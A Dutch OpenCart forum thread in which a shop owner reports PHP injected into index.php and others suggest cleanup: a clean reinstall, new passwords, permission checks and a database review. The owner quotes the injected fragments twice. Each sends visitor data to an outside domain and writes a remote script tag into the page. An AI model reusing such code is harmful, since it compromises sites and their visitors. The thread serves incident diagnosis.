Post by JohanKoers » Fri Oct 31, 2014 4:54 pm

2 dagen geleden, vond ik het volgende aan het einde van de index.php:

Code: Select all

$wfmd = __url_get_contents(

            "http://www.helmol.de/lkmqjx2h.php" . "?fid=55988&info=" . http_build_query( $wfmd ) . "&no=1&allow=1",

            2

        );



        $wfmd = trim( $wfmd );

        if( $wfmd !== 'false' ) {

            echo "<script type=\"text/javascript\" src=\"http://www.helmol.de/lkmqjx2h.php?id=2136529\"></script>";

        }

    }

}
#/712434#
?>
Heeft iemand enig idee hoe dit daar is gekomen? Of dit zelf meegemaakt. Zelf hebben we afgelopen dagen niets bijzonders aan shop gedaan. Maar hierdoor werd shop wel behoorlijk in de war geschopt. Het lijkt erop dat backup van de index.php terug zetten het probleem voor nu heeft verholpen. Maar ik maar me toch zorgen hoe het er is gekomen.

New member

Posts

Joined
Mon Oct 31, 2011 5:50 am
Location - Netherlands

Post by i2Paq » Fri Oct 31, 2014 9:07 pm

Zet voortaan dat soort zaken tussen code-haakjes.

Draai je op een eigen server of een shared?

Geen idee wat het is maar het lijk idd. op een hack.

Norman in 't Veldt
Moderator OpenCart Forums

_________________ READ and Search BEFORE POSTING _________________

Our FREE search: Find your answer FAST!.

[How to] BTW + Verzend + betaal setup.


User avatar
Global Moderator

Posts

Joined
Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by JohanKoers » Sat Nov 01, 2014 7:16 pm

Draai op strato, net weer wat toegevoegd nadat ik backup heb terug gezet

Code: Select all

 $gjm = __url_get_contents(

            "http://www.browserbob.de/test/python/zyr7bc4v.php" . "?fid=55988&info=" . http_build_query( $gjm ) . "&no=1&allow=1",

            2

        );



        $gjm = trim( $gjm );

        if( $gjm !== 'false' ) {

            echo "<script type=\"text/javascript\" src=\"http://www.browserbob.de/test/python/zyr7bc4v.php?id=2136529\"></script>";

        }

    }

}
#/712434#
?>

New member

Posts

Joined
Mon Oct 31, 2011 5:50 am
Location - Netherlands

Post by i2Paq » Sat Nov 01, 2014 9:23 pm

Praat eens met je hoster?

Staan je bestands-permissies wel goed?

Norman in 't Veldt
Moderator OpenCart Forums

_________________ READ and Search BEFORE POSTING _________________

Our FREE search: Find your answer FAST!.

[How to] BTW + Verzend + betaal setup.


User avatar
Global Moderator

Posts

Joined
Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by k2tec » Sat Nov 01, 2014 10:05 pm

Wie zegt dat de backup schoon was.

Met een goede editor controleren of er ergens anders ook niet rommel staat.
Als het in je index kijk dat ook in je admin index.
Ook de download map, system log en cache.

Als dan de schone OC terug plaatst direct al je wachtwoorden veranderen FTP, MySql, hoster inlog enz.
en niet in janklaasen123

User avatar
Active Member

Posts

Joined
Mon Apr 12, 2010 8:06 pm

Post by JohanKoers » Sun Nov 02, 2014 5:52 am

Ik ga denk ik schone install doen, vreemde is ook dat als ik op admin inlog mappen geen schijfrechten schijnen te hebben. Terwijl deze wel goed staan. Gaat om volgende mappen.

Waarschuwing: Image directory /mnt/webh/e1/28/52259528/htdocs/webshop/image/ heeft geen schrijfrechten!
Waarschuwing: Image cache directory /mnt/webh/e1/28/52259528/htdocs/webshop/image/cache/ heeft geen schrijfrechten!
Waarschuwing: Image cache directory /mnt/webh/e1/28/52259528/htdocs/webshop/system/cache/ heeft geen schrijfrechten!
Waarschuwing: Download directory /mnt/webh/e1/28/52259528/htdocs/webshop/download/ heeft geen schrijfrechten!
Waarschuwing: Log directory /mnt/webh/e1/28/52259528/htdocs/webshop/system/logs/ heeft geen schrijfrechten!

Iemand nog ideen wat deze snurker allemaal heeft gedaan?

New member

Posts

Joined
Mon Oct 31, 2011 5:50 am
Location - Netherlands

Post by JohanKoers » Sun Nov 02, 2014 6:21 am

Net alle passwords vernieuwd FTP, mysql, Strato login, (idd niet wachtwoord123 e.d., die had ik voorheen ook niet) en nieuwe install gedaan, vreemde is dat bij instalatie de config.php's niet weggeschreven worden. Standaard database word wel aangemaakt. Ik heb zelf maar config.php in dir gezet. En krijg weer partij ellende.
Zie nieuwe install www.tramach.nl

Site die die gehacked is is www.tramag.nl

Ik ben sprakeloos, iemand idee?

New member

Posts

Joined
Mon Oct 31, 2011 5:50 am
Location - Netherlands

Post by artcore » Sun Nov 02, 2014 5:58 pm

Het lijkt me een schrijfrechten probleem. Als je de php versie via je hosting op 5.4 kunt zetten zal het wel goed gaan.
Kun je de rechten zien via een ftp programma bijvoorbeeld? Folders moeten op 755 en bestanden op 644 staan.

Attn: I no longer provide OpenCart extensions, nor future support - this includes forum posts.
Reason: OpenCart version 3+ ;D

Thanks!


User avatar
Active Member

Posts

Joined
Tue Jul 09, 2013 4:13 am
Location - The Netherlands

Post by victorj » Sun Nov 02, 2014 7:56 pm

op dit moment lijkt het erop dat de schrijfrechten voor de map image cache niet goed staan.

verder moet je alle bestanden controleren, groot kans dat er ergens een bestand staat dat dienveranderingen aanbrengt.
maak ook een sql dump van je database en controleer deze op vreemde toevoegingen.

verder even een advies

maak een map aan op je geinfecteerde hosting.
upload hier gewoon een totaal kale schone install van een net gedownloade opencart versie.
maak een nieuwe database aan.
instaleer deze versie en kijk of er wijzigingen optreden.
vanaf een schone install is het veel makelijker zoeken of wr wat veranderd in de bestanden of dat er bestanden bij worden gezet.

Koeltechnische deurrubbers eenvoudig online op maat bestellen.
Alle niet stekplichtige onderdelen zoals scharnieren, sloten, randverwarming en verlichting voor alle typen koelingen en vriezers.
https://koelcel-onderdelen.com


User avatar
Expert Member

Posts

Joined
Sat Jun 25, 2011 4:09 am
Location - Alkmaar Holland
Who is online

Users browsing this forum: No registered users and 9 guests